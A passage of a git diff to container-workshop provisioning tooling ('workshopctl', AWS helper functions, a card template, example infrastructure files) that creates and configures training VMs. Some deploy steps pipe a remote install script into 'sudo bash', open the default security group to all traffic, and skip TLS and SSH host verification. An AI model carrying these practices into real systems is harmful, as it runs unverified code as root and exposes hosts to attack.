- Print the cards file: `prepare-vms/tags/myworkshop/ips.html`
## Other Tools
### Deploying your SSH key to all the machines
- Make sure that you have SSH keys loaded (`ssh-add -l`).
- Source `rc`.
- Run `pcopykey`.
## Even More Details
@@ -201,7 +188,7 @@ To see which local key will be uploaded, run `ssh-add -l | grep RSA`.
#### Instance + tag creation
The VMs will be started, with an automatically generated tag (timestamp + your username).
10 VMs will be started, with an automatically generated tag (timestamp + your username).
Your SSH key will be added to the `authorized_keys` of the ubuntu user.
@@ -209,11 +196,15 @@ Your SSH key will be added to the `authorized_keys` of the ubuntu user.
Following the creation of the VMs, a text file will be created containing a list of their IPs.
This ips.txt file will be created in the $TAG/ directory and a symlink will be placed in the working directory of the script.
If you create new VMs, the symlinked file will be overwritten.
#### Deployment
Instances can be deployed manually using the `deploy` command:
$ ./workshopctl deploy TAG
$ ./workshopctl deploy TAG settings/somefile.yaml
The `postprep.py` file will be copied via parallel-ssh to all of the VMs and executed.
@@ -223,7 +214,7 @@ The `postprep.py` file will be copied via parallel-ssh to all of the VMs and exe
#### Generate cards
$ ./workshopctl cards TAG
$ ./workshopctl cards TAG settings/somefile.yaml
If you want to generate both HTML and PDF cards, install [wkhtmltopdf](https://wkhtmltopdf.org/downloads.html); without that installed, only HTML cards will be generated.
@@ -231,11 +222,13 @@ If you don't have `wkhtmltopdf` installed, you will get a warning that it is a m
#### List tags
$ ./workshopctl list infra/some-infra-file
$ ./workshopctl list
$ ./workshopctl listall
#### List VMs
$ ./workshopctl tags
$ ./workshopctl list TAG
This will print a human-friendly list containing some information about each instance.
#### Stop and destroy VMs

106
prepare-vms/cards.html Normal file
View File

@@ -0,0 +1,106 @@
{# Feel free to customize or override anything in there! #}
{%- set url = "http://container.training/" -%}
{%- set pagesize = 12 -%}
{%- if clustersize == 1 -%}
{%- set workshop_name = "Docker workshop" -%}
{%- set cluster_or_machine = "machine" -%}
{%- set this_or_each = "this" -%}
{%- set machine_is_or_machines_are = "machine is" -%}
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
{%- else -%}
{%- set workshop_name = "orchestration workshop" -%}
{%- set cluster_or_machine = "cluster" -%}
{%- set this_or_each = "each" -%}
{%- set machine_is_or_machines_are = "machines are" -%}
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
{%- set image_src = image_src_swarm -%}
{%- endif -%}
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><style>
body, table {
margin: 0;
padding: 0;
line-height: 1em;
font-size: 14px;
}
table {
border-spacing: 0;
margin-top: 0.4em;
margin-bottom: 0.4em;
border-left: 0.8em double grey;
padding-left: 0.4em;
}
div {
float: left;
border: 1px dotted black;
padding-top: 1%;
padding-bottom: 1%;
/* columns * (width+left+right) < 100% */
width: 21.5%;
padding-left: 1.5%;
padding-right: 1.5%;
}
p {
margin: 0.4em 0 0.4em 0;
}
img {
height: 4em;
float: right;
margin-right: -0.4em;
}
.logpass {
font-family: monospace;
font-weight: bold;
}
.pagebreak {
page-break-after: always;
clear: both;
display: block;
height: 8px;
}
</style></head>
<body>
{% for cluster in clusters %}
{% if loop.index0>0 and loop.index0%pagesize==0 %}
<span class="pagebreak"></span>
{% endif %}
<div>
<p>
Here is the connection information to your very own
{{ cluster_or_machine }} for this {{ workshop_name }}.
You can connect to {{ this_or_each }} VM with any SSH client.
</p>
<p>
<img src="{{ image_src }}" />
<table>
<tr><td>login:</td></tr>
<tr><td class="logpass">docker</td></tr>
<tr><td>password:</td></tr>
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
</table>
</p>
<p>
Your {{ machine_is_or_machines_are }}:
<table>
{% for node in cluster %}
<tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
{% endfor %}
</table>
</p>
<p>You can find the slides at:
<center>{{ url }}</center>
</p>
</div>
{% endfor %}
</body>
</html>

View File

Can't render this file because it contains an unexpected character in line 1 and column 42.

View File

@@ -7,6 +7,15 @@ fi
if id docker; then
sudo userdel -r docker
fi
sudo apt-get update -q
sudo apt-get install -qy jq python-pip wkhtmltopdf xvfb
pip install --user awscli jinja2 pdfkit pssh
pip install --user awscli jinja2 pdfkit
sudo apt-get install -y wkhtmltopdf xvfb
tmux new-session \; send-keys "
[ -f ~/.ssh/id_rsa ] || ssh-keygen
eval \$(ssh-agent)
ssh-add
Xvfb :0 &
export DISPLAY=:0
mkdir -p ~/www
sudo docker run -d -p 80:80 -v \$HOME/www:/usr/share/nginx/html nginx
"

View File

@@ -1,6 +0,0 @@
INFRACLASS=aws
# If you are using AWS to deploy, copy this file (e.g. to "aws", or "us-east-1")
# and customize the variables below.
export AWS_DEFAULT_REGION=us-east-1
export AWS_ACCESS_KEY_ID=AKI...
export AWS_SECRET_ACCESS_KEY=...

View File

@@ -1,2 +0,0 @@
INFRACLASS=generic
# This is for manual provisioning. No other variable or configuration is needed.

View File

@@ -1,9 +0,0 @@
INFRACLASS=openstack
# If you are using OpenStack, copy this file (e.g. to "openstack" or "enix")
# and customize the variables below.
export TF_VAR_user="jpetazzo"
export TF_VAR_tenant="training"
export TF_VAR_domain="Default"
export TF_VAR_password="..."
export TF_VAR_auth_url="https://api.r1.nxs.enix.io/v3"
export TF_VAR_flavor="GP1.S"

105
prepare-vms/lib/aws.sh Normal file
View File

@@ -0,0 +1,105 @@
aws_display_tags() {
# Print all "Name" tags in our region with their instance count
echo "[#] [Status] [Token] [Tag]" \
| awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
aws ec2 describe-instances \
--query "Reservations[*].Instances[*].[State.Name,ClientToken,Tags[0].Value]" \
| tr -d "\r" \
| uniq -c \
| sort -k 3 \
| awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
}
aws_get_tokens() {
aws ec2 describe-instances --output text \
--query 'Reservations[*].Instances[*].[ClientToken]' \
| sort -u
}
aws_display_instance_statuses_by_tag() {
TAG=$1
need_tag $TAG
IDS=$(aws ec2 describe-instances \
--filters "Name=tag:Name,Values=$TAG" \
--query "Reservations[*].Instances[*].InstanceId" | tr '\t' ' ')
aws ec2 describe-instance-status \
--instance-ids $IDS \
--query "InstanceStatuses[*].{ID:InstanceId,InstanceState:InstanceState.Name,InstanceStatus:InstanceStatus.Status,SystemStatus:SystemStatus.Status,Reachability:InstanceStatus.Status}" \
--output table
}
aws_display_instances_by_tag() {
TAG=$1
need_tag $TAG
result=$(aws ec2 describe-instances --output table \
--filter "Name=tag:Name,Values=$TAG" \
--query "Reservations[*].Instances[*].[ \
InstanceId, \
State.Name, \
Tags[0].Value, \
PublicIpAddress, \
InstanceType \
]"
)
if [[ -z $result ]]; then
die "No instances found with tag $TAG in region $AWS_DEFAULT_REGION."
else
echo "$result"
fi
}
aws_get_instance_ids_by_filter() {
FILTER=$1
aws ec2 describe-instances --filters $FILTER \
--query Reservations[*].Instances[*].InstanceId \
--output text | tr "\t" "\n" | tr -d "\r"
}
aws_get_instance_ids_by_client_token() {
TOKEN=$1
need_tag $TOKEN
aws_get_instance_ids_by_filter Name=client-token,Values=$TOKEN
}
aws_get_instance_ids_by_tag() {
TAG=$1
need_tag $TAG
aws_get_instance_ids_by_filter Name=tag:Name,Values=$TAG
}
aws_get_instance_ips_by_tag() {
TAG=$1
need_tag $TAG
aws ec2 describe-instances --filter "Name=tag:Name,Values=$TAG" \
--output text \
--query "Reservations[*].Instances[*].PublicIpAddress" \
| tr "\t" "\n" \
| sort -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4 # sort IPs
}
aws_kill_instances_by_tag() {
TAG=$1
need_tag $TAG
IDS=$(aws_get_instance_ids_by_tag $TAG)
if [ -z "$IDS" ]; then
die "Invalid tag."
fi
info "Deleting instances with tag $TAG."
aws ec2 terminate-instances --instance-ids $IDS \
| grep ^TERMINATINGINSTANCES
info "Deleted instances with tag $TAG."
}
aws_tag_instances() {
OLD_TAG_OR_TOKEN=$1
NEW_TAG=$2
IDS=$(aws_get_instance_ids_by_client_token $OLD_TAG_OR_TOKEN)
[[ -n "$IDS" ]] && aws ec2 create-tags --tag Key=Name,Value=$NEW_TAG --resources $IDS >/dev/null
IDS=$(aws_get_instance_ids_by_tag $OLD_TAG_OR_TOKEN)
[[ -n "$IDS" ]] && aws ec2 create-tags --tag Key=Name,Value=$NEW_TAG --resources $IDS >/dev/null
}

View File

@@ -50,41 +50,27 @@ sep() {
fi
}
need_infra() {
if [ -z "$1" ]; then
die "Please specify infrastructure file. (e.g.: infra/aws)"
fi
if [ "$1" = "--infra" ]; then
die "The infrastructure file should be passed directly to this command. Remove '--infra' and try again."
fi
if [ ! -f "$1" ]; then
die "Infrastructure file $1 doesn't exist."
fi
. "$1"
. "lib/infra/$INFRACLASS.sh"
}
need_tag() {
if [ -z "$TAG" ]; then
if [ -z "$1" ]; then
die "Please specify a tag or token. To see available tags and tokens, run: $0 list"
fi
if [ ! -d "tags/$TAG" ]; then
die "Tag $TAG not found (directory tags/$TAG does not exist)."
fi
for FILE in settings.yaml ips.txt infra.sh; do
if [ ! -f "tags/$TAG/$FILE" ]; then
warning "File tags/$TAG/$FILE not found."
fi
done
. "tags/$TAG/infra.sh"
. "lib/infra/$INFRACLASS.sh"
}
need_settings() {
if [ -z "$1" ]; then
die "Please specify a settings file. (e.g.: settings/kube101.yaml)"
fi
if [ ! -f "$1" ]; then
die "Please specify a settings file."
elif [ ! -f "$1" ]; then
die "Settings file $1 doesn't exist."
fi
}
need_ips_file() {
IPS_FILE=$1
if [ -z "$IPS_FILE" ]; then
die "IPS_FILE not set."
fi
if [ ! -s "$IPS_FILE" ]; then
die "IPS_FILE $IPS_FILE not found. Please run: $0 ips <TAG>"
fi
}

View File

@@ -2,16 +2,26 @@ export AWS_DEFAULT_OUTPUT=text
HELP=""
_cmd() {
HELP="$(printf "%s\n%-20s %s\n" "$HELP" "$1" "$2")"
HELP="$(printf "%s\n%-12s %s\n" "$HELP" "$1" "$2")"
}
_cmd help "Show available commands"
_cmd_help() {
printf "$(basename $0) - the container training swiss army knife\n"
printf "$(basename $0) - the orchestration workshop swiss army knife\n"
printf "Commands:"
printf "%s" "$HELP" | sort
}
_cmd amis "List Ubuntu AMIs in the current region"
_cmd_amis() {
find_ubuntu_ami -r $AWS_DEFAULT_REGION "$@"
}
_cmd ami "Show the AMI that will be used for deployment"
_cmd_ami() {
find_ubuntu_ami -r $AWS_DEFAULT_REGION -a amd64 -v 16.04 -t hvm:ebs -N -q
}
_cmd build "Build the Docker image to run this program in a container"
_cmd_build() {
docker-compose build
@@ -22,62 +32,73 @@ _cmd_wrap() {
docker-compose run --rm workshopctl "$@"
}
_cmd cards "Generate ready-to-print cards for a group of VMs"
_cmd cards "Generate ready-to-print cards for a batch of VMs"
_cmd_cards() {
TAG=$1
need_tag
SETTINGS=$2
need_tag $TAG
need_settings $SETTINGS
# This will process ips.txt to generate two files: ips.pdf and ips.html
(
cd tags/$TAG
../../lib/ips-txt-to-html.py settings.yaml
)
# If you're not using AWS, populate the ips.txt file manually
if [ ! -f tags/$TAG/ips.txt ]; then
aws_get_instance_ips_by_tag $TAG >tags/$TAG/ips.txt
fi
# Remove symlinks to old cards
rm -f ips.html ips.pdf
# This will generate two files in the base dir: ips.pdf and ips.html
lib/ips-txt-to-html.py $SETTINGS
for f in ips.html ips.pdf; do
# Remove old versions of cards if they exist
rm -f tags/$TAG/$f
# Move the generated file and replace it with a symlink
mv -f $f tags/$TAG/$f && ln -s tags/$TAG/$f $f
done
info "Cards created. You can view them with:"
info "xdg-open tags/$TAG/ips.html tags/$TAG/ips.pdf (on Linux)"
info "open tags/$TAG/ips.html (on macOS)"
info "xdg-open ips.html ips.pdf (on Linux)"
info "open ips.html ips.pdf (on MacOS)"
}
_cmd deploy "Install Docker on a bunch of running VMs"
_cmd_deploy() {
TAG=$1
need_tag
SETTINGS=$2
need_tag $TAG
need_settings $SETTINGS
link_tag $TAG
count=$(wc -l ips.txt)
# wait until all hosts are reachable before trying to deploy
info "Trying to reach $TAG instances..."
while ! tag_is_reachable; do
while ! tag_is_reachable $TAG; do
>/dev/stderr echo -n "."
sleep 2
done
>/dev/stderr echo ""
echo deploying > tags/$TAG/status
sep "Deploying tag $TAG"
# Wait for cloudinit to be done
pssh "
while [ ! -f /var/lib/cloud/instance/boot-finished ]; do
sleep 1
done"
# Copy settings and install Python YAML parser
pssh -I tee /tmp/settings.yaml <tags/$TAG/settings.yaml
pssh -I tee /tmp/settings.yaml <$SETTINGS
pssh "
sudo apt-get update &&
sudo apt-get install -y python-yaml"
sudo apt-get install -y python-setuptools &&
sudo easy_install pyyaml"
# Copy postprep.py to the remote machines, and execute it, feeding it the list of IP addresses
pssh -I tee /tmp/postprep.py <lib/postprep.py
pssh --timeout 900 --send-input "python /tmp/postprep.py >>/tmp/pp.out 2>>/tmp/pp.err" <tags/$TAG/ips.txt
pssh --timeout 900 --send-input "python /tmp/postprep.py >>/tmp/pp.out 2>>/tmp/pp.err" <ips.txt
# Install docker-prompt script
pssh -I sudo tee /usr/local/bin/docker-prompt <lib/docker-prompt
pssh sudo chmod +x /usr/local/bin/docker-prompt
# If /home/docker/.ssh/id_rsa doesn't exist, copy it from the first node
# If /home/docker/.ssh/id_rsa doesn't exist, copy it from node1
pssh "
sudo -u docker [ -f /home/docker/.ssh/id_rsa ] ||
ssh -o StrictHostKeyChecking=no \$(cat /etc/name_of_first_node) sudo -u docker tar -C /home/docker -cvf- .ssh |
ssh -o StrictHostKeyChecking=no node1 sudo -u docker tar -C /home/docker -cvf- .ssh |
sudo -u docker tar -C /home/docker -xf-"
# if 'docker@' doesn't appear in /home/docker/.ssh/authorized_keys, copy it there
@@ -86,78 +107,24 @@ _cmd_deploy() {
cat /home/docker/.ssh/id_rsa.pub |
sudo -u docker tee -a /home/docker/.ssh/authorized_keys"
# On the first node, create and deploy TLS certs using Docker Machine
# On node1, create and deploy TLS certs using Docker Machine
# (Currently disabled.)
true || pssh "
if i_am_first_node; then
grep '[0-9]\$' /etc/hosts |
if grep -q node1 /tmp/node; then
grep ' node' /etc/hosts |
xargs -n2 sudo -H -u docker \
docker-machine create -d generic --generic-ssh-user docker --generic-ip-address
fi"
sep "Deployed tag $TAG"
echo deployed > tags/$TAG/status
info "You may want to run one of the following commands:"
info "$0 kube $TAG"
info "$0 pull_images $TAG"
info "$0 cards $TAG"
}
_cmd disabledocker "Stop Docker Engine and don't restart it automatically"
_cmd_disabledocker() {
TAG=$1
need_tag
pssh "sudo systemctl disable docker.service"
pssh "sudo systemctl disable docker.socket"
pssh "sudo systemctl stop docker"
}
_cmd kubebins "Install Kubernetes and CNI binaries but don't start anything"
_cmd_kubebins() {
TAG=$1
need_tag
pssh --timeout 300 "
set -e
cd /usr/local/bin
if ! [ -x etcd ]; then
curl -L https://github.com/etcd-io/etcd/releases/download/v3.3.10/etcd-v3.3.10-linux-amd64.tar.gz \
| sudo tar --strip-components=1 --wildcards -zx '*/etcd' '*/etcdctl'
fi
if ! [ -x hyperkube ]; then
curl -L https://dl.k8s.io/v1.14.1/kubernetes-server-linux-amd64.tar.gz \
| sudo tar --strip-components=3 -zx kubernetes/server/bin/hyperkube
fi
if ! [ -x kubelet ]; then
for BINARY in kubectl kube-apiserver kube-scheduler kube-controller-manager kubelet kube-proxy;
do
sudo ln -s hyperkube \$BINARY
done
fi
sudo mkdir -p /opt/cni/bin
cd /opt/cni/bin
if ! [ -x bridge ]; then
curl -L https://github.com/containernetworking/plugins/releases/download/v0.7.5/cni-plugins-amd64-v0.7.5.tgz \
| sudo tar -zx
fi
"
info "$0 cards $TAG $SETTINGS"
}
_cmd kube "Setup kubernetes clusters with kubeadm (must be run AFTER deploy)"
_cmd_kube() {
TAG=$1
need_tag
# Optional version, e.g. 1.13.5
KUBEVERSION=$2
if [ "$KUBEVERSION" ]; then
EXTRA_KUBELET="=$KUBEVERSION-00"
EXTRA_KUBEADM="--kubernetes-version=v$KUBEVERSION"
else
EXTRA_KUBELET=""
EXTRA_KUBEADM=""
fi
# Install packages
pssh --timeout 200 "
@@ -167,19 +134,19 @@ _cmd_kube() {
sudo tee /etc/apt/sources.list.d/kubernetes.list"
pssh --timeout 200 "
sudo apt-get update -q &&
sudo apt-get install -qy kubelet$EXTRA_KUBELET kubeadm kubectl &&
sudo apt-get install -qy kubelet kubeadm kubectl
kubectl completion bash | sudo tee /etc/bash_completion.d/kubectl"
# Initialize kube master
pssh --timeout 200 "
if i_am_first_node && [ ! -f /etc/kubernetes/admin.conf ]; then
kubeadm token generate > /tmp/token &&
sudo kubeadm init $EXTRA_KUBEADM --token \$(cat /tmp/token) --apiserver-cert-extra-sans \$(cat /tmp/ipv4)
if grep -q node1 /tmp/node && [ ! -f /etc/kubernetes/admin.conf ]; then
kubeadm token generate > /tmp/token
sudo kubeadm init --token \$(cat /tmp/token)
fi"
# Put kubeconfig in ubuntu's and docker's accounts
pssh "
if i_am_first_node; then
if grep -q node1 /tmp/node; then
sudo mkdir -p \$HOME/.kube /home/docker/.kube &&
sudo cp /etc/kubernetes/admin.conf \$HOME/.kube/config &&
sudo cp /etc/kubernetes/admin.conf /home/docker/.kube/config &&
@@ -189,102 +156,53 @@ _cmd_kube() {
# Install weave as the pod network
pssh "
if i_am_first_node; then
kubever=\$(kubectl version | base64 | tr -d '\n') &&
if grep -q node1 /tmp/node; then
kubever=\$(kubectl version | base64 | tr -d '\n')
kubectl apply -f https://cloud.weave.works/k8s/net?k8s-version=\$kubever
fi"
# Join the other nodes to the cluster
pssh --timeout 200 "
if ! i_am_first_node && [ ! -f /etc/kubernetes/kubelet.conf ]; then
FIRSTNODE=\$(cat /etc/name_of_first_node) &&
TOKEN=\$(ssh -o StrictHostKeyChecking=no \$FIRSTNODE cat /tmp/token) &&
sudo kubeadm join --discovery-token-unsafe-skip-ca-verification --token \$TOKEN \$FIRSTNODE:6443
if ! grep -q node1 /tmp/node && [ ! -f /etc/kubernetes/kubelet.conf ]; then
TOKEN=\$(ssh -o StrictHostKeyChecking=no node1 cat /tmp/token)
sudo kubeadm join --discovery-token-unsafe-skip-ca-verification --token \$TOKEN node1:6443
fi"
# Install metrics server
pssh "
if i_am_first_node; then
kubectl apply -f https://raw.githubusercontent.com/jpetazzo/container.training/master/k8s/metrics-server.yaml
fi"
# Install kubectx and kubens
pssh "
[ -d kubectx ] || git clone https://github.com/ahmetb/kubectx &&
sudo ln -sf /home/ubuntu/kubectx/kubectx /usr/local/bin/kctx &&
sudo ln -sf /home/ubuntu/kubectx/kubens /usr/local/bin/kns &&
sudo cp /home/ubuntu/kubectx/completion/*.bash /etc/bash_completion.d &&
[ -d kube-ps1 ] || git clone https://github.com/jonmosco/kube-ps1 &&
sudo -u docker sed -i s/docker-prompt/kube_ps1/ /home/docker/.bashrc &&
sudo -u docker tee -a /home/docker/.bashrc <<EOF
. /home/ubuntu/kube-ps1/kube-ps1.sh
KUBE_PS1_PREFIX=""
KUBE_PS1_SUFFIX=""
KUBE_PS1_SYMBOL_ENABLE="false"
KUBE_PS1_CTX_COLOR="green"
KUBE_PS1_NS_COLOR="green"
EOF"
# Install stern
pssh "
if [ ! -x /usr/local/bin/stern ]; then
##VERSION##
sudo curl -L -o /usr/local/bin/stern https://github.com/wercker/stern/releases/download/1.11.0/stern_linux_amd64 &&
sudo chmod +x /usr/local/bin/stern &&
sudo curl -L -o /usr/local/bin/stern https://github.com/wercker/stern/releases/download/1.8.0/stern_linux_amd64
sudo chmod +x /usr/local/bin/stern
stern --completion bash | sudo tee /etc/bash_completion.d/stern
fi"
# Install helm
pssh "
if [ ! -x /usr/local/bin/helm ]; then
curl https://raw.githubusercontent.com/kubernetes/helm/master/scripts/get | sudo bash &&
curl https://raw.githubusercontent.com/kubernetes/helm/master/scripts/get | sudo bash
helm completion bash | sudo tee /etc/bash_completion.d/helm
fi"
# Install ship
pssh "
if [ ! -x /usr/local/bin/ship ]; then
curl -L https://github.com/replicatedhq/ship/releases/download/v0.40.0/ship_0.40.0_linux_amd64.tar.gz |
sudo tar -C /usr/local/bin -zx ship
fi"
# Install the AWS IAM authenticator
pssh "
if [ ! -x /usr/local/bin/aws-iam-authenticator ]; then
##VERSION##
sudo curl -o /usr/local/bin/aws-iam-authenticator https://amazon-eks.s3-us-west-2.amazonaws.com/1.12.7/2019-03-27/bin/linux/amd64/aws-iam-authenticator
sudo chmod +x /usr/local/bin/aws-iam-authenticator
fi"
sep "Done"
}
_cmd kubereset "Wipe out Kubernetes configuration on all nodes"
_cmd_kubereset() {
TAG=$1
need_tag
pssh "sudo kubeadm reset --force"
}
_cmd kubetest "Check that all nodes are reporting as Ready"
_cmd kubetest "Check that all notes are reporting as Ready"
_cmd_kubetest() {
TAG=$1
need_tag
# There are way too many backslashes in the command below.
# Feel free to make that better ♥
pssh "
set -e
if i_am_first_node; then
[ -f /tmp/node ]
if grep -q node1 /tmp/node; then
which kubectl
for NODE in \$(awk /[0-9]\$/\ {print\ \\\$2} /etc/hosts); do
for NODE in \$(awk /\ node/\ {print\ \\\$2} /etc/hosts); do
echo \$NODE ; kubectl get nodes | grep -w \$NODE | grep -w Ready
done
fi"
}
_cmd ids "(FIXME) List the instance IDs belonging to a given tag or token"
_cmd ids "List the instance IDs belonging to a given tag or token"
_cmd_ids() {
TAG=$1
need_tag $TAG
@@ -297,289 +215,262 @@ _cmd_ids() {
aws_get_instance_ids_by_client_token $TAG
}
_cmd list "List available groups for a given infrastructure"
_cmd ips "List the IP addresses of the VMs for a given tag or token"
_cmd_ips() {
TAG=$1
need_tag $TAG
mkdir -p tags/$TAG
aws_get_instance_ips_by_tag $TAG | tee tags/$TAG/ips.txt
link_tag $TAG
}
_cmd list "List available batches in the current region"
_cmd_list() {
need_infra $1
infra_list
info "Listing batches in region $AWS_DEFAULT_REGION:"
aws_display_tags
}
_cmd listall "List VMs running on all configured infrastructures"
_cmd_listall() {
for infra in infra/*; do
case $infra in
infra/example.*)
;;
*)
info "Listing infrastructure $infra:"
need_infra $infra
infra_list
;;
esac
done
}
_cmd ping "Ping VMs in a given tag, to check that they have network access"
_cmd_ping() {
_cmd status "List instance status for a given batch"
_cmd_status() {
info "Using region $AWS_DEFAULT_REGION."
TAG=$1
need_tag
fping < tags/$TAG/ips.txt
}
_cmd netfix "Disable GRO and run a pinger job on the VMs"
_cmd_netfix () {
TAG=$1
need_tag
pssh "
sudo ethtool -K ens3 gro off
sudo tee /root/pinger.service <<EOF
[Unit]
Description=pinger
[Install]
WantedBy=multi-user.target
[Service]
WorkingDirectory=/
ExecStart=/bin/ping -w60 1.1
User=nobody
Group=nogroup
Restart=always
EOF
sudo systemctl enable /root/pinger.service
sudo systemctl start pinger"
need_tag $TAG
describe_tag $TAG
tag_is_reachable $TAG
info "You may be interested in running one of the following commands:"
info "$0 ips $TAG"
info "$0 deploy $TAG <settings/somefile.yaml>"
}
_cmd opensg "Open the default security group to ALL ingress traffic"
_cmd_opensg() {
need_infra $1
infra_opensg
}
aws ec2 authorize-security-group-ingress \
--group-name default \
--protocol icmp \
--port -1 \
--cidr 0.0.0.0/0
_cmd disableaddrchecks "Disable source/destination IP address checks"
_cmd_disableaddrchecks() {
TAG=$1
need_tag
aws ec2 authorize-security-group-ingress \
--group-name default \
--protocol udp \
--port 0-65535 \
--cidr 0.0.0.0/0
infra_disableaddrchecks
}
_cmd pssh "Run an arbitrary command on all nodes"
_cmd_pssh() {
TAG=$1
need_tag
shift
pssh "$@"
aws ec2 authorize-security-group-ingress \
--group-name default \
--protocol tcp \
--port 0-65535 \
--cidr 0.0.0.0/0
}
_cmd pull_images "Pre-pull a bunch of Docker images"
_cmd_pull_images() {
TAG=$1
need_tag
pull_tag
need_tag $TAG
pull_tag $TAG
}
_cmd quotas "Check our infrastructure quotas (max instances)"
_cmd_quotas() {
need_infra $1
infra_quotas
}
_cmd retag "(FIXME) Apply a new tag to a group of VMs"
_cmd retag "Apply a new tag to a batch of VMs"
_cmd_retag() {
OLDTAG=$1
NEWTAG=$2
TAG=$OLDTAG
need_tag
need_tag $OLDTAG
if [[ -z "$NEWTAG" ]]; then
die "You must specify a new tag to apply."
fi
aws_tag_instances $OLDTAG $NEWTAG
}
_cmd ssh "Open an SSH session to the first node of a tag"
_cmd_ssh() {
TAG=$1
need_tag
IP=$(head -1 tags/$TAG/ips.txt)
info "Logging into $IP"
ssh docker@$IP
}
_cmd start "Start a group of VMs"
_cmd start "Start a batch of VMs"
_cmd_start() {
while [ ! -z "$*" ]; do
case "$1" in
--infra) INFRA=$2; shift 2;;
--settings) SETTINGS=$2; shift 2;;
--count) COUNT=$2; shift 2;;
--tag) TAG=$2; shift 2;;
*) die "Unrecognized parameter: $1."
esac
done
# Number of instances to create
COUNT=$1
# Optional settings file (to carry on with deployment)
SETTINGS=$2
if [ -z "$INFRA" ]; then
die "Please add --infra flag to specify which infrastructure file to use."
fi
if [ -z "$SETTINGS" ]; then
die "Please add --settings flag to specify which settings file to use."
fi
if [ -z "$COUNT" ]; then
COUNT=$(awk '/^clustersize:/ {print $2}' $SETTINGS)
warning "No --count option was specified. Using value from settings file ($COUNT)."
die "Indicate number of instances to start."
fi
# Check that the specified settings and infrastructure are valid.
need_settings $SETTINGS
need_infra $INFRA
# Print our AWS username, to ease the pain of credential-juggling
greet
if [ -z "$TAG" ]; then
TAG=$(make_tag)
# Upload our SSH keys to AWS if needed, to be added to each VM's authorized_keys
key_name=$(sync_keys)
AMI=$(_cmd_ami) # Retrieve the AWS image ID
if [ -z "$AMI" ]; then
die "I could not find which AMI to use in this region. Try another region?"
fi
mkdir -p tags/$TAG
ln -s ../../$INFRA tags/$TAG/infra.sh
ln -s ../../$SETTINGS tags/$TAG/settings.yaml
echo creating > tags/$TAG/status
TOKEN=$(get_token) # generate a timestamp token for this batch of VMs
AWS_KEY_NAME=$(make_key_name)
sep "Starting instances"
info " Count: $COUNT"
info " Region: $AWS_DEFAULT_REGION"
info " Token/tag: $TOKEN"
info " AMI: $AMI"
info " Key name: $AWS_KEY_NAME"
result=$(aws ec2 run-instances \
--key-name $AWS_KEY_NAME \
--count $COUNT \
--instance-type ${AWS_INSTANCE_TYPE-t2.medium} \
--client-token $TOKEN \
--image-id $AMI)
reservation_id=$(echo "$result" | head -1 | awk '{print $2}')
info "Reservation ID: $reservation_id"
sep
# if instance creation succeeded, we should have some IDs
IDS=$(aws_get_instance_ids_by_client_token $TOKEN)
if [ -z "$IDS" ]; then
die "Instance creation failed."
fi
# Tag these new instances with a tag that is the same as the token
TAG=$TOKEN
aws_tag_instances $TOKEN $TAG
wait_until_tag_is_running $TAG $COUNT
infra_start $COUNT
sep
info "Successfully created $COUNT instances with tag $TAG"
sep
echo created > tags/$TAG/status
info "To deploy Docker on these instances, you can run:"
info "$0 deploy $TAG"
info "To terminate these instances, you can run:"
info "$0 stop $TAG"
mkdir -p tags/$TAG
IPS=$(aws_get_instance_ips_by_tag $TAG)
echo "$IPS" >tags/$TAG/ips.txt
link_tag $TAG
if [ -n "$SETTINGS" ]; then
_cmd_deploy $TAG $SETTINGS
else
info "To deploy or kill these instances, run one of the following:"
info "$0 deploy $TAG <settings/somefile.yaml>"
info "$0 stop $TAG"
fi
}
_cmd ec2quotas "Check our EC2 quotas (max instances)"
_cmd_ec2quotas() {
greet
max_instances=$(aws ec2 describe-account-attributes \
--attribute-names max-instances \
--query 'AccountAttributes[*][AttributeValues]')
info "In the current region ($AWS_DEFAULT_REGION) you can deploy up to $max_instances instances."
# Print list of AWS EC2 regions, highlighting ours ($AWS_DEFAULT_REGION) in the list
# If our $AWS_DEFAULT_REGION is not valid, the error message will be pretty descriptive:
# Could not connect to the endpoint URL: "https://ec2.foo.amazonaws.com/"
info "Available regions:"
aws ec2 describe-regions | awk '{print $3}' | grep --color=auto $AWS_DEFAULT_REGION -C50
}
_cmd stop "Stop (terminate, shutdown, kill, remove, destroy...) instances"
_cmd_stop() {
TAG=$1
need_tag
infra_stop
echo stopped > tags/$TAG/status
need_tag $TAG
aws_kill_instances_by_tag $TAG
}
_cmd tags "List groups of VMs known locally"
_cmd_tags() {
(
cd tags
echo "[#] [Status] [Tag] [Infra]" \
| awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
for tag in *; do
if [ -f $tag/ips.txt ]; then
count="$(wc -l < $tag/ips.txt)"
else
count="?"
fi
if [ -f $tag/status ]; then
status="$(cat $tag/status)"
else
status="?"
fi
if [ -f $tag/infra.sh ]; then
infra="$(basename $(readlink $tag/infra.sh))"
else
infra="?"
fi
echo "$count $status $tag $infra" \
| awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
done
)
}
_cmd test "Run tests (pre-flight checks) on a group of VMs"
_cmd test "Run tests (pre-flight checks) on a batch of VMs"
_cmd_test() {
TAG=$1
need_tag
test_tag
need_tag $TAG
test_tag $TAG
}
_cmd helmprom "Install Helm and Prometheus"
_cmd_helmprom() {
TAG=$1
need_tag
pssh "
if i_am_first_node; then
kubectl -n kube-system get serviceaccount helm ||
kubectl -n kube-system create serviceaccount helm
sudo -u docker -H helm init --service-account helm
kubectl get clusterrolebinding helm-can-do-everything ||
kubectl create clusterrolebinding helm-can-do-everything \
--clusterrole=cluster-admin \
--serviceaccount=kube-system:helm
sudo -u docker -H helm upgrade --install prometheus stable/prometheus \
--namespace kube-system \
--set server.service.type=NodePort \
--set server.service.nodePort=30090 \
--set server.persistentVolume.enabled=false \
--set alertmanager.enabled=false
fi"
}
# Sometimes, weave fails to come up on some nodes.
# Symptom: the pods on a node are unreachable (they don't even ping).
